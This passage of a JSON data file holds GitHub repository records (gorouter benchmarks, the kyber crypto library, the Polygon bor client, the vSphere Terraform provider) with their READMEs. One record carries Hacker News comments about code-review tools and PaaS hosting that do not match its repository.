\t 30000\t 57793 ns/op\t 13832 B/op\t 406 allocs/op\nBenchmarkGoRouter2WithGithubAPI2-8 \t 30000\t 57613 ns/op\t 13832 B/op\t 406 allocs/op\nBenchmarkChiRouterWithGithubAPI2-8 \t 10000\t 143224 ns/op\t 104436 B/op\t 1110 allocs/op\nBenchmarkMuxRouterWithGithubAPI2-8 \t 300\t 4450731 ns/op\t 61463 B/op\t 995 allocs/op\nPASS\nok \tgithub.com/xujiajun/gorouter\t15.918s\n\n```\n\n### Conclusions:\n\n* Performance (xujiajun/gorouter,julienschmidt/httprouter and teambition/trie-mux are fast)\n\n* Memory Consumption (xujiajun/gorouter and julienschmidt/httprouter are fewer) \n\n* Features (julienschmidt/httprouter not supports regexp\uff0cbut others support it)\n\n> if you want a high performance router which supports regexp, maybe [xujiajun/gorouter](https://github.com/xujiajun/gorouter) is good choice.\n\n> if you want a high performance router which not supports regexp, maybe [julienschmidt/httprouter](https://github.com/julienschmidt/httprouter) is good choice.\n\nIn the end, as julienschmidt said `performance can not be the (only) criterion for choosing a router. Play around a bit with some of the routers, and choose the one you like best.`\n\n## Contributing\n\nIf you'd like to help out with the project. You can put up a Pull Request. 
Thanks to all [contributors](https://github.com/xujiajun/gorouter/graphs/contributors).\n\n## Author\n\n* [xujiajun](https://github.com/xujiajun)\n\n## License\n\ngorouter is open-source software licensed under the [MIT License](http://www.opensource.org/licenses/MIT).\n\n## Acknowledgements\n\nThis package is inspired by the following:\n\n* [httprouter](https://github.com/julienschmidt/httprouter)\n* [bone](https://github.com/go-zoo/bone)\n* [trie-mux](https://github.com/teambition/trie-mux)\n* [alien](https://github.com/gernest/alien)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dedis/kyber", "link": "https://github.com/dedis/kyber", "tags": ["crypto-library", "elliptic-curves", "go"], "stars": 533, "description": "Advanced crypto library for the Go language", "lang": "Go", "repo_lang": "", "readme": "[![Go test](https://github.com/dedis/kyber/actions/workflows/go_tests.yml/badge.svg)](https://github.com/dedis/kyber/actions/workflows/go_tests.yml)\n[![Coverage Status](https://coveralls.io/repos/github/dedis/kyber/badge.svg?branch=master)](https://coveralls.io/github/dedis/kyber?branch=master)\n[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=dedis_kyber&metric=alert_status)](https://sonarcloud.io/summary/new_code?id=dedis_kyber)\n[![Go Reference](https://pkg.go.dev/badge/github.com/dedis/kyber.svg)](https://pkg.go.dev/github.com/dedis/kyber)\n\nDEDIS Advanced Crypto Library for Go\n====================================\n\nThis package provides a toolbox of advanced cryptographic primitives for Go,\ntargeting applications like [Cothority](https://go.dedis.ch/cothority)\nthat need more than straightforward signing and encryption.\nPlease see the\n[Godoc documentation for this package](https://godoc.org/go.dedis.ch/kyber)\nfor details on the library's purpose and API functionality.\n\nThis package includes a mix of variable time and constant time\nimplementations. If your application is sensitive to timing-based attacks\nand you need to constrain Kyber to offering only constant time implementations,\nyou should use the [suites.RequireConstantTime()](https://godoc.org/go.dedis.ch/kyber/suites#RequireConstantTime)\nfunction in the `init()` function of your `main` package.\n\nVersioning - Development\n------------------------\n\nWe use the following versioning model:\n\n* crypto.v0 was the first semi-stable version. See [migration notes](https://github.com/dedis/kyber/wiki/Migration-from-gopkg.in-dedis-crypto.v0).\n* kyber.v1 never existed, in order to keep kyber, onet and cothority versions linked\n* gopkg.in/dedis/kyber.v2 was the last stable version\n* Starting with v3.0.0, kyber is a Go module, and we respect [semantic versioning](https://golang.org/cmd/go/#hdr-Module_compatibility_and_semantic_versioning).\n\nSo if you depend on the master branch, you can expect breakages from time\nto time. If you need something that doesn't change in a backward-compatible\nway, you should have a `go.mod` file in the directory where your\nmain package is.\n\nUsing the module\n----------------\n\nKyber supports Go modules, and currently has a major version of 3, which means that\nthe import path is: `go.dedis.ch/kyber/v3`.\n\nHere is a basic example of getting started using it:\n1. Make a new directory called \u201cex\". 
Change directory to \u201cex\" and put this in main.go:\n```go\npackage main\n\nimport (\n \"fmt\"\n \"go.dedis.ch/kyber/v3/suites\"\n)\n\nfunc main() {\n s := suites.MustFind(\"Ed25519\")\n x := s.Scalar().Zero()\n fmt.Println(x)\n}\n```\n2. Type \u201cgo mod init example.com/ex\u201d. The resulting go.mod file will have no dependencies listed yet.\n3. Type \u201cgo build\u201d. The go tool will fill in the new dependencies that it find for you, i.e. \"require go.dedis.ch/kyber/v3 v3.0.13\u201d.\n4. Running `./ex` will print `0000000000000000000000000000000000000000000000000000000000000000`.\n\nA note on deriving shared secrets\n---------------------------------\n\nTraditionally, ECDH (Elliptic curve Diffie-Hellman) derives the shared secret\nfrom the x point only. In this framework, you can either manually retrieve the\nvalue or use the MarshalBinary method to take the combined (x, y) value as the\nshared secret. We recommend the latter process for new softare/protocols using\nthis framework as it is cleaner and generalizes across different types of groups\n(e.g., both integer and elliptic curves), although it will likely be\nincompatible with other implementations of ECDH. See [the Wikipedia\npage](http://en.wikipedia.org/wiki/Elliptic_curve_Diffie%E2%80%93Hellman) on\nECDH.\n\nReporting security problems\n---------------------------\n\nThis library is offered as-is, and without a guarantee. It will need an\nindependent security review before it should be considered ready for use in\nsecurity-critical applications. If you integrate Kyber into your application it\nis YOUR RESPONSIBILITY to arrange for that audit.\n\nIf you notice a possible security problem, please report it\nto dedis-security@epfl.ch.\n", "readme_type": "markdown", "hn_comments": "HashiCorp Vault?I also miss CodeFlow. At Amazon now and their review tool sucks.This is cool! I'm happy to see more options in this space.The best code review tool I've ever used was a tool at Google called Critique.[0] They've open-sourced it as Gerrit[1], but there are sadly no hosted versions available for under $15k/yr, and it's complicated to self-host.I've been using Reviewable, and my experience has been good not great. Github's native code review has caught up a bit, but Github's review tool falls apart if your review lasts more than one round.Here are my gripes with Reviewable:Steep learning curve - Every new developer who joins the team spends their first few reviews being confused and frustrated by Reviewable.Performance - Reviewable has awful performance. It takes about 10 seconds to load a code review. It seems like it's doing some odd websockets stuff where sometimes my \"connection\" to Reviewable will drop and I can't add comments. I've never experienced this with any other web app. It's gotten better over the last few years, but it's still annoyingly frequent.Complicated configuration - I just want the reviewer to be able to hit an \"LGTM\" button to mark their approval. Reviewable's decision about when a PR is approved is based on this complicated function combining whether the reviewer typed the text \":lgtm\", how many people looked at the review, whether they also hit the approve button. Each repo has its own configuration, and I can't make org-level changes without changing every repo one at a time.Excessive permissions - This might be a Github thing, but you can't grant Reviewable permissions to a particular private repo - you have to grant it permissions to all of your private repos. 
Several developers who join my team need to create a dedicated Github account to avoid exposing their other private repos to Reviewable.Thread state is unclear - The options are \"discussing\", \"satisfied,\" \"blocking,\" or \"working,\" and it's not obvious who's supposed to move the thread to what state at what point.No development - I've been a paying customer of Reviewable for about 7 years, and I can remember only 1-2 minor features that have been added during that time. They haven't updated their blog[2] in 6 years, and they've never communicated with me as a paying customer to tell me anything they're doing.I checked out Crocodile, and it looks like it has potential. I'm not sure I'd pitch it to my team to switch yet. Here are some of my thoughts:* When do the reviewer's comments become visible to the author? One of the must-have features for me is that both author and reviwer(s) can prepare a set of notes, but they're not visible to anyone else until they hit \"publish\" to share them with the team. Sometimes I make comments in one spot, and then as I read more of the code, I revise a previous comment. If all my comments publish immediately, I can't revise comments like that. Github, Reviewable, and Gerrit all support a flow of preparing comments and then committing them in a separate step.* Crocodile touts the floating thread thing, and I've never used a tool that has it, but it doesn't seem better to me. Inline comments do break the flow, but floating comments actually cover up the code and prevent me from reading it. I see I can close threads, but I can't figure out how to get them back.* Being able to comment on character-level granularity is cool!* I think your thread state is better than Reviewable's, but I'd prefer an even simpler model where threads are either \"open\" or \"resolved.\" When an author responds to a comment, the default action is to resolve it, but the author can override the default and leave it \"open\" if their comment is asking for clarification rather than declaring a fix. The reviewer can reopen a thread if they feel that the author has misunderstood the note. 95% of the time in my reviews, the reviewer makes a note and the author resolves it, so having a whole extra confirmation phase for that last 5% feels unnecessary when the reviewer can just reopen it instead.* Ditto for review state. The only two states I've ever needed for a code review are \"pending approval\" and \"approved.\" I've never wanted to mark a PR as \"rejected\" unless it's just a spam submission from a stranger on an open-source repo, and even then, I'd close it from Github rather than my code review tool. The worst I'll do to a teammate is withhold approval until they address my notes, but I'd never mark it as \"rejected.\" I don't need an explicit state for \"pending review\" or \"waiting for author\" because if the author is the last commenter, it's implicitly pending review.* I like that there's a view of all the comments at once. I like to review all my comments before pushing them to the author.* I'd like a way to mark a comment as \"no action required\" when I just want to say something nice[2] about the code that doesn't require action from the author.* I couldn't understand the \"iterations\" UI control. It's not obvious to me what the different circles represent.[4] Once I compared two diffs, I couldn't figure out how to compare to the the full PR to the base branch (i.e., all commits aggregated). 
I think it's replicating a control that Reviewable actually does pretty well, so I recommend giving it a look for inspiration.* It looks like I'm only allowed to make code-level comments, but I'd like to make review-level comments as well for high-level notes about the review as a whole.Hope that's useful. I'm very interested in code reviews, so if you want to do user interviews, feel free to reach out. You can find my contact info through my HN profile.[0] https://abseil.io/resources/swe-book/html/ch19.html[1] https://www.gerritcodereview.com/[2] http://blog.reviewable.io/[3] https://mtlynch.io/human-code-reviews-2/#offer-sincere-prais...[4] https://i.imgur.com/3ZhDAR1.pngCongratulations on the launch. I find reviewing code on GitHub to be a pain too, so we came up with DiffLens (https://github.com/marketplace/difflens). DiffLens is only concerned with showing better diffs though, and doesn't handle comments on GitHub at all. Maybe there's room here for us to combine our approaches :) Our email is support@difflens.com if you want to get in touch.> * Comments float above the code> * Comment on any text selection in the file> * Comments don't get lost when code changesThis addresses my main pet peeves with GitHub/Bitbucket reviews!2 questions:With regards to comments not getting lost, how well does this work across rebases and force pushes?Are you considering supporting other products like Bitbucket and Gitlab?Thanks for calling out that this was inspired by CodeFlow, I kept thinking that as I was reading. Still one of my favorite code review tools, used ~2012.One of my favorite features was a panel with every comment on the PR, sorted and organized by status. Because all files in the PR were preloaded clicking a comment instantly took you to the specific code and version. So good!I like the site + product idea, but the demo fails to show me anything interesting except a floating comment. So I can't yet see the value of the tool.The files you've chosen to use don't appear to show any difference between iteration 1 and 2, so one of your major features doesn't do anything. Is that a bug, or accidental? (I'm using Firefox 101 on MacOS 11.4).My personal dumb suggestion: give a few demos, showing off the very worst points of code review hell, and how crocodile fixes each one. Make it a game. E.g.\"You're halfway through a large code review, and Sally has just added 2 new commits, ugh. Challenge: find the button to see the new additions, then decide if you want to include them in your current review, or review this iteration first and the new additions separately.\"\"Simon has just added a merge commit that fucks everything up, all the files look weird. Challenge: there's a way you can trivially see that the PR before this extra commit was looking great.\"\"You can spot a new method that was introduced, and you'd like to see the places where it's being called, but that's a lot of scrolling back and forth. Challenge: find how to show code hints on a selected piece of text\"Nice idea! I'd be interested in giving it a try for our project in the future.It does seem that the demo review is broken in Safari, I get a JS error and the UI doesn't seem to work completely:> [Error] TypeError: e.connect is not a function. (In 'e.connect(l,s)', 'e.connect' is undefined)Also, is there any way to keep up-to-date on the project? I don't see a newsletter or Twitter link on your homepage.Oh wow, this looks great. 
Congratulations!This provides better UX but adds one more redirection when you are using github.Do you support features like github suggestions which can be committed easily by author?Given your history with Microsoft and their internal tool which this is inspired by, how long until github copies some of the ideas?How many active users does this have?Are there potential problems you see outside of current product?I remember a startup providing paid code reviews as a service launched on HN a while ago. That could be a pivot for example in providing more value.looks very interesting. a quick question about pricing: do we need to pay for all people in our github organization or can pick a few? we have some bot users, translator access, but only need the review tool for developers.Are there plans for Gitlab?I am a bit at odd with the pricing. My team has 6 engineers and base price for Github is $24. Your product would increase our bill by $48, an increase of 200%. $48 is nothing compared to the salaries of 6 engineers but I am not convinced the feature set would make my team more productive.If you told me that your solution help my team ship faster and saves an hour per engineer per week then that's easy math: your product pays for itself.Suggestions: - Make all base features free (the ones on your site currently)\n - Add analytics to your product, collect data and put it behind a paywall (entirely or partially by truncating historical data)\n - Iterate on premium features that improves critical metrics\n - Offer analytics with a trial of 2 to 3 months, enough time for graphs to speak for themselves\n - Make sure the gains are seen by the manager or business owner or whoever is the person in charge\n\nPricing can be based on the average of hours saved.It's worth trying. There's one quibble: How does Crocodile access my source code?\n\n Crocodile stores the source code files that are part of reviews to provide a \n fast user experience. Every file is encrypted with per file data encryption \n keys. The data encryption keys are then encrypted with a master encryption key. \n All cryptographic operations are performed using Google Tink, which is a \n cryptographic library created by cryptographers at Google that is designed to be misuse resistant.\n\n Files are encrypted using Stream AEAD using AES128_GCM_HKDF_4KB key type as recommended by Google.\n\n The data encryption keys above are encrypted using AEAD with a master AES128 key.\n\nSo, um, what's the story with the master encryption key? Are the master keys in their own file?\nE.g., if Crocodile gets hacked, can the hackers pull up everyone's reviews (and sources)? Or \ndoes all this encryption keep it encrypted at rest and require something from the user \n(e.g., their password) to derive the master key?Not a knock against crocodile, which looks like a nice set of improvements over gh, but something I\u2019d like to see done better in any code review system is significantly better code navigation.For any PR that is nontrivial I will pull it locally so that I can more easily navigate to functions/data types that are used by or changed in the PR. It would be nice if the review ui provided a way to click through to the definition of a symbol that appears in the code. (I think gh does this when browsing code for some languages.)A related helpful feature would be the ability to see \u201cwhat calls this\u201d. 
Currently I have to do this kind of review with \u2018git grep\u2019, after pulling locally.I\u2019d also love to be able to toggle into \u2018git blame\u2019 for a given bit of code, in order to better understand why the code is in its current stateNit: Couple typos on landing page: coversation, shorcut. Worth taking a pass with a spell checker.Congrats on the launch! Here's a demo link in case folks might have missed it:https://app.crocodile.dev/reviews/rwsfSKbgZoSt?change=README...This looks great! Food for thought on pricing: Because you offer free for open source, there\u2019s minimal need for a free trial for private repos. I would consider requiring a credit card and making it a 14 day trial. My experience selling SaaS in the past is this will net you fewer but much more serious evals, so whenever someone signs up you know they are legit and worth your time to contact and support. That leads to higher conversion, better retention, etc.Best of luck!This looks super interesting, it looks like it'd solve a few of my gripes with GitHub reviews. Congratulations on the launch!One thing I've always wondered is why all these review tools use centralised databases. Git itself is a distributed model and reviews tend to boil down to code comments on set of lines or characters. I'm always surprised no one has created a review tool that ships around reviews like patch files. Even if there was a server as an option, like github, I could then work offline and build little tools to help make my review process more efficient.I suppose it's not quite as easy to monitise as it's decentralised, but I'd love to see one crop up some day. Then my review process can match up with my coding process.Either way this looks like a big improvement in some areas over the GitHub tools so I'll definitely be checking it out.\u201cYou can comment anywhere in the file and on any text selection, even if it's just one character.\u201dI\u2019ve been looking for this feature forever. A changed line might impact code that wasn\u2019t changed. There wasn\u2019t a convenient way to comment on those. Looking forward to trying this.This looks fantastic! I'd love to try this out, but I don't have admin access to the repo I work in and IT will definitely not approve a random new app. Any chance I can set this up with a personal access token instead?My biggest issue with Github code reviews is how broken the \"Changes requested\" state is. If I request changes, there's no easy way to see that changes have been addressed and are clear for me to look at again.I end up using open unresolved comments as the basis for changes requested now. It's hard to filter for those though.Congrats on launch!How does this compare with Convox?As someone that is happy paying 5-10x more for heroku, you can easily get me (and people like me) if you focus on onboarding.Automatically generate the first yaml/config file from looking at my codebase? Heroku-like CLI that generates/updates the YAML file? Heroku gives me \"redis\" without me needing to learn anything about AWS/YAML-config shit.One-Click starter file for 10-most popular apps...- rails/postgres/redis- create-react-app- static site generator- node/serverlessHey Matus, good job!YAML validation and vscode extension is very cool. I hope it helps adoption.What about observability? Logging, monitoring, alerting? 
Security infrastructure, everything from setting up IAM with better security for both human and machine users, to vulnerability scanning, WAF, anti-DDoS, TLS certificates, DNS, edge caching/CDN...? Backups? Separate environments for development, staging, production, that stay consistent?Look, your landing page example is cute, but it's not fully production ready. And by the time you finish adding everything to make it fully production ready, you'll be back up to the 600 lines of configuration that you're currently demonizing.Look, this shit is hard. I get it. I recently got mindfucked by the intricacies of single table design in DynamoDB, and the sheer complexity of doing that correctly, for the sole benefit of hiring fewer $200k/year engineers, plus the headache of trying to hire the right ones, plus their post-hire management overhead. And that's barely DevOps adjacent!I'm not convinced that you can truly remove the complexity. The more features you throw on your PaaS, the more configuration options you expose. Eventually, the configuration for your PaaS gets complicated enough that you hire an engineer who knows the PaaS very well and they become your DevOps engineer. Then you realize that you didn't actually solve your problem, you just made it harder, because the PaaS never exposes everything you actually need, so either you need to wait for the PaaS to implement it, or you start to migrate off it.Appreciate it's just an MVP but I think there's a good niche you can go down. Big Data on AWS is such a pain to set-up (Glue, EMR, RedShift, LakeFormation), with IAM policies and roles a simple data pipeline is around 500 lines of YAML. Would be good if you could add native support for that, so say you have some CSV in S3 you want to convert to parquet, drop null fields, and then make shareable with another AWS account. Would solve a massive problem for meNot sure what to make of this. Given the active security incident, is \"Heroku-like\" really a recommendation?But even past that, what does this give me beyond AWS CodePipelines? All comparisons on the site seem to be against \"raw\" AWS (\"weeks to months\" from code to deployment, really?).But, hey, maybe I'm misunderstanding both this product and CodePipelines. Myself, I'm on Azure DevOps (which I guess is the same as \"MS Azure\" as opposed to \"Google Azure\"?), and there I can deploy my aspnetcore app to production in, like, 30s. Today.So, what can I look forward to in 2023 with this product?Very cool, maybe making a visual builder for YAML haters could be and additional killer feature.Looks interesting but makes little sense for Rails stacks at least, Hatchbox is some kind of de facto, especially at 15 US per server.I always think I should really look into automating deployment of Rails apps into a VPS. All these services seem to make really good money and I bet very few stacks beat the absolute hell that is to deploy Rails.This sounds very similar to AWS CDK. How does it compare?It's always painful to setup infra for any project that I do as I want to focus on aplication not doing the devops, I'll try this one outI have been very active in the PaaS in your cloud model in past. My analysis leads to the fact that no one has really pulled off heroku in your cloud kind product in recent time. There has been big exits like pivotal et al. Mind you it was before the kubernetes era. Post kubernetes era PaaS in your cloud has become very commoditized. 
As a PaaS-in-your-cloud (piyc) model as product you are not only competing with other product in the category list here [1] but also the internal platform teams in bigger orgs. Also, it is one of the competitive segment in devtool, devops space. Also having spent over 2 year in the space, I think heroku on AWS is an anti-thesis. I wanted heroku like experience I would start with heroku and not AWS. What you dont know yet is that it is a leaky abstraction as you start acquiring customers and very slow onboarding experience. AWS also made an attempt to build a heroku like product called app runner, which is I think is not that successful.[1]https://github.com/debarshibasak/awesome-paasLooks like a great product! I am also working on a similar product (https://cdevframework.io) in the same space, but I am focusing only on Python at the moment.Are you using a custom IaaC management tool for the deployments, or is it compiling down to something like Aws Cloudformation or Terraform Providers?This looks pretty cool. My main question is: what would I have to do if I require an AWS component that is not supported by this tool? What is the developer experience of having to include a CloudFormation stack alongside this solution?Asking because I see this as the #1 obstacle to getting buy-in in certain corporate environments. If we need a bit more flexibility, what does that look like?I wish you luck on your journey with this. We were in the similar space as a YC S20 company - trying to create a Heroku-like experience on AWS. There's been plenty other attempts as well.[1]After working in this space for a couple years, I realized that unfortunately the market just doesn't exist. Small enough teams will typically hack their way through building an MVP and early versions. They don't need/want the complexity of kubernetes/terraform, most literally run their MVP on a couple of instances. On the other side, once you get big enough, you hire dedicated people to start solving these problems. The middle market in between the two is very small and you most likely will be beat by the services already built into AWS such as Amplify.[1] https://github.com/debarshibasak/awesome-paasYou may want to put a comparison to Cloud66 on your website, since it's a similar tool (\"Heroku\" hosted on your own cloud account) that's been around for years.I think the comparisons on the site (e.g., vs. Heroku) are misleading. With Heroku (and true competitors such as Railway.app), I don't need to create configuration files for my app, for Redis and the PostgreSQL database I want to use, etc. I pick out some things from a UI, hook it up to my GitHub repo, and deploy (putting side the recent Heroku/GitHub OAuth security issues).I'd be interested in seeing Stacktape vs. Qovery, which seems a bit more closely related.Great idea! I'm curious how many options you're planning to cover. E.g. I couldn't find my use case of needing a Go Lambda triggered by a cron job that connects to an Aurora Postgres db.EDIT: Was trying to figure out a disparity in timing- I didn't know about the rescue pool feature!Years ago, there was a fantastic platform that did this called dotCloud. It worked great.That company spun off its technology into Docker and then shut down dotCloud, which I have always been sad about.Thanks for building this!The same issue I have with Render, I also have with this. 
If you have to create a config file for the environment, you aren't giving me a Heroku-like experience.Give me an opinionated default that works well for most situations that I can then build on top of, configure further, etc..Sorry I\u2019m sure that\u2019s a great and wonderful product, but I\u2019m so pissed off by yaml files that I can only hope one day humanity will figure out a better alternative to yaml and json for configuration files. I\u2019m using a lot of yaml with the serverless framework and I hate that. And no, infrastructure as code like terraform or aws cdk always looked too limited or strangely designedNot everyone is writing web apps.Do those solutions run on your smartphone? Your car? Your IoT devices?Custom code can also give businesses a competitve edge because they can do things that others using existing code cannot.> You need some APIs \u2192 API GatewayAn API Gateway doesn't make APIs?In the early years just after Faraday invented the electric motor in 1821, everything was custom. There we no established norms for wire, insulation, etc. Those only happened after sufficient practice in the art made the optimums, in 1883 according to Wikipedia.It wasn't until 1924 that the modern circuit breaker was invented to protect electrical circuits from overload.---The computer was invented circa 1946 by Von Neuman. It was back ported to the ENIAC, which made the machine much slower, but easier to program. Since that time, many standards have emerged, EBCDIC, ASCII, UTF-8, etc. All the basic technologies are in wide use, so standardization occurred. What we don't have yet is the equivalent to fuses or circuit breakers, or the common household outlet.We have no way of allocating only certain resources to a computing problem, and being sure of the lack of side effects. In effect, no standard for insulation from side effects.---All of this written to point out that nobody has a sure way to prevent unwanted side effects from a given line of code, and we're building stacks upon stacks of layers. Someone is going to have to sort this mess out and build standardized, UL certified (or equivalent) components for connecting up data sources and sinks. (Events are data, with timestamps)Once that happens, some of us will be the ones turning out modules, and the rest of us will be electricians, hooking all the bits together. I expect there will always be a need for programming, as we know it now, because it takes a rich expressive grammar to make interesting and useful things happen the first time. Once it's figured out, in can be productized, and shipped.> I know some of you will say they have some special custom app with very custom logic that is so unique that can only be done in code.Basically that's the way it is.As an Architect I have to look for no code solutions, then low code and if non fit only then do I have a justification for a custom build.Sometimes a solution is a combination of those techniques.You need to hang out with some stakeholders, those animals will easily come up with a feature that requires a crafted solution.35 years ago, that same question was asked, but in a different context. It was thought that when there are BASIC and spreadsheets there is no need to do any more serious coding.Even more so 25 years ago when various GUIs became ubiquitous.About 20 years ago, Flash and Dreamweaver were promising the same.You see where it's going.GitHub Copilot made me think of the same thing. 
I write the method description as a comment in plain English and it spits out a pretty good approximation of what I would have written. I've been using it only for a few weeks but I'm already so hooked up that I prefer to take a break when the service is down :DIf you are an insurance company the way you calculate premiums is absolutely critical to both sales and profitability. And these are not just algorithms, they are systems. Same applies wherever. If you can do without code you have no edge.Sounds naive. Do you have any experience with real-world projects? We're nowhere close to just writing some glue code. Web APIs are moving in that direction but the software world is a vast ocean and APIs are just a drop in the bucket.If you add up the cpu/memory requirements for redis, rabbitmq, mysql etc., that itself adds up to a beefy machine. Then the network traffic from the users.Better to package/run these as docker components on 2 beefy VM's w/ a LB from a provider like DigitalOcean, Vultr, Linode or Hetzner. You can pick up AWS etc, but be mindful of all the costs that add up.Kubernetes is a no-no unless you have some level of proficiency in kubernetes, or are willing to invest the time.Packaging your applications as docker images from the beginning requires little extra effort, but gives you a number of deployment options and if you grow it will be easy to move to eg. k8s.Setup your servers using ansible, puppet or similar to lower the requirements for redundancy and backups (if you cant take a little downtime in case of accident)If you're Europe based, one suggestion is to get two ~$50 servers from Hetzner and run all services in plain docker. (i.e. two servers for redundancy)Depending on your setup and requirements, it might even be enough to have one server + a cheap CDN and in that case you might even be able to run the server at home or a friends office.This is quite a bit of infrastructure for an app that hasn't launched yet. If it's not too late, consider simplifying by removing RabbitMQ or Redis. Perhaps even getting rid of both, and only using MySQL. Maybe your workers could become cron-jobs or threads.For hosting, consider Heroku and Heroku add-ons for MySQL, Redis, and RabbitMQ. You could run workers in Heroku as well.It would be possible to run this entirely in a VPS as well and fairly straightforward. I've also had success running the web app (with postgres and redis) in Heroku but the workers on a VPS.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "maticnetwork/bor", "link": "https://github.com/maticnetwork/bor", "tags": ["matic", "ethereum", "go", "bor"], "stars": 533, "description": "Official repository for the Matic Blockchain", "lang": "Go", "repo_lang": "", "readme": "# Bor Overview\nBor is the Official Golang implementation of the Matic protocol. 
It is a fork of Go Ethereum - https://github.com/ethereum/go-ethereum and EVM compatible.\n\n![Forks](https://img.shields.io/github/forks/maticnetwork/bor?style=social)\n![Stars](https://img.shields.io/github/stars/maticnetwork/bor?style=social)\n![Languages](https://img.shields.io/github/languages/count/maticnetwork/bor)\n![Issues](https://img.shields.io/github/issues/maticnetwork/bor)\n![PRs](https://img.shields.io/github/issues-pr-raw/maticnetwork/bor)\n![MIT License](https://img.shields.io/github/license/maticnetwork/bor)\n![contributors](https://img.shields.io/github/contributors-anon/maticnetwork/bor)\n![size](https://img.shields.io/github/languages/code-size/maticnetwork/bor)\n![lines](https://img.shields.io/tokei/lines/github/maticnetwork/bor)\n[![Discord](https://img.shields.io/discord/714888181740339261?color=1C1CE1&label=Polygon%20%7C%20Discord%20%F0%9F%91%8B%20&style=flat-square)](https://discord.gg/zdwkdvMNY2)\n[![Twitter Follow](https://img.shields.io/twitter/follow/0xPolygon.svg?style=social)](https://twitter.com/0xPolygon)\n\n## How to contribute\n\n### Contribution Guidelines\nWe believe one of the things that makes Polygon special is its coherent design and we seek to retain this defining characteristic. From the outset we defined some guidelines to ensure new contributions only ever enhance the project:\n\n* Quality: Code in the Polygon project should meet the style guidelines, with sufficient test-cases, descriptive commit messages, evidence that the contribution does not break any compatibility commitments or cause adverse feature interactions, and evidence of high-quality peer-review\n* Size: The Polygon project\u2019s culture is one of small pull-requests, regularly submitted. The larger a pull-request, the more likely it is that you will be asked to resubmit as a series of self-contained and individually reviewable smaller PRs\n* Maintainability: If the feature will require ongoing maintenance (eg support for a particular brand of database), we may ask you to accept responsibility for maintaining this feature\n### Submit an issue\n\n- Create a [new issue](https://github.com/maticnetwork/bor/issues/new/choose)\n- Comment on the issue (if you'd like to be assigned to it) - that way [our team can assign the issue to you](https://github.blog/2019-06-25-assign-issues-to-issue-commenters/).\n- If you do not have a specific contribution in mind, you can also browse the issues labelled as `help wanted`\n- Issues that additionally have the `good first issue` label are considered ideal for first-timers\n\n### Fork the repository (repo)\n\n- If you're not sure, here's how to [fork the repo](https://help.github.com/en/articles/fork-a-repo)\n\n- If this is your first time forking our repo, this is all you need to do for this step:\n\n ```\n $ git clone git@github.com:[your_github_handle]/bor\n ```\n\n- If you've already forked the repo, you'll want to ensure your fork is configured and that it's up to date. 
This will save you the headache of potential merge conflicts.\n\n- To [configure your fork](https://docs.github.com/en/github/collaborating-with-issues-and-pull-requests/configuring-a-remote-for-a-fork):\n\n ```\n $ git remote add upstream https://github.com/maticnetwork/bor\n ```\n\n- To [sync your fork with the latest changes](https://docs.github.com/en/github/collaborating-with-issues-and-pull-requests/syncing-a-fork):\n\n ```\n $ git checkout master\n $ git fetch upstream\n $ git merge upstream/master\n ```\n\n### Building the source\n\n- Building `bor` requires both Go (version 1.19 or later) and a C compiler. You can install\nthem using your favourite package manager. Once the dependencies are installed, run\n\n ```shell\n $ make bor\n ```\n\n### Make awesome changes!\n\n1. Create a new branch for your changes\n\n ```\n $ git checkout -b new_branch_name\n ```\n\n2. Commit and prepare for a pull request (PR). In your PR commit message, reference the issue it resolves (see [how to link a commit message to an issue using a keyword](https://docs.github.com/en/free-pro-team@latest/github/managing-your-work-on-github/linking-a-pull-request-to-an-issue#linking-a-pull-request-to-an-issue-using-a-keyword)).\n\n\n Check out our [Git-Rules](https://docs.polygon.technology/docs/contribute/orientation#git-rules).\n\n ```\n $ git commit -m \"brief description of changes [Fixes #1234]\"\n ```\n\n3. Push to your GitHub account\n\n ```\n $ git push\n ```\n\n### Submit your PR\n\n- After your changes are committed to your GitHub fork, submit a pull request (PR) to the `master` branch of the `maticnetwork/bor` repo\n- In your PR description, reference the issue it resolves (see [linking a pull request to an issue using a keyword](https://docs.github.com/en/free-pro-team@latest/github/managing-your-work-on-github/linking-a-pull-request-to-an-issue#linking-a-pull-request-to-an-issue-using-a-keyword))\n - ex. `Updates out of date content [Fixes #1234]`\n- Why not say hi and draw attention to your PR in [our Discord server](https://discord.gg/zdwkdvMNY2)?\n\n### Wait for review\n\n- The team reviews every PR\n- Acceptable PRs will be approved & merged into the `master` branch\n\n
\n\n## Release\n\n- You can [view the history of releases](https://github.com/maticnetwork/bor/releases), which include PR highlights\n\n
\n\n\n## License\n\nThe go-ethereum library (i.e. all code outside of the `cmd` directory) is licensed under the\n[GNU Lesser General Public License v3.0](https://www.gnu.org/licenses/lgpl-3.0.en.html),\nalso included in our repository in the `COPYING.LESSER` file.\n\nThe go-ethereum binaries (i.e. all code inside of the `cmd` directory) is licensed under the\n[GNU General Public License v3.0](https://www.gnu.org/licenses/gpl-3.0.en.html), also\nincluded in our repository in the `COPYING` file.\n\n
\n\n## Join our Discord server\n\nJoin Polygon community \u2013 share your ideas or just say hi over [on Discord](https://discord.gg/zdwkdvMNY2).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hashicorp/terraform-provider-vsphere", "link": "https://github.com/hashicorp/terraform-provider-vsphere", "tags": ["terraform", "terraform-provider", "vsphere"], "stars": 533, "description": "Terraform Provider for VMware vSphere", "lang": "Go", "repo_lang": "", "readme": "\n\n \"Terraform\"\n\n\n# Terraform Provider for VMware vSphere\n\n[![GitHub tag (latest SemVer)](https://img.shields.io/github/v/tag/hashicorp/terraform-provider-vsphere?label=release&style=for-the-badge)](https://github.com/hashicorp/terraform-provider-vsphere/releases/latest) [![License](https://img.shields.io/github/license/hashicorp/terraform-provider-vsphere.svg?style=for-the-badge)](LICENSE)\n\nThe Terraform Provider for VMware vSphere is a plugin for Terraform that allows you to interact with VMware vSphere, notably [vCenter Server][vmware-vcenter] and [ESXi][vmware-esxi]. This provider can be used to manage a VMware vSphere environment, including virtual machines, host and cluster management, inventory, networking, storage, datastores, content libraries, and more.\n\nLearn more:\n\n* Read the provider [documentation][provider-documentation].\n\n* Join the community [discussions][provider-discussions].\n\n## Requirements\n\n* [Terraform 0.13+][terraform-install]\n\n For general information about Terraform, visit [terraform.io][terraform-install] and [the 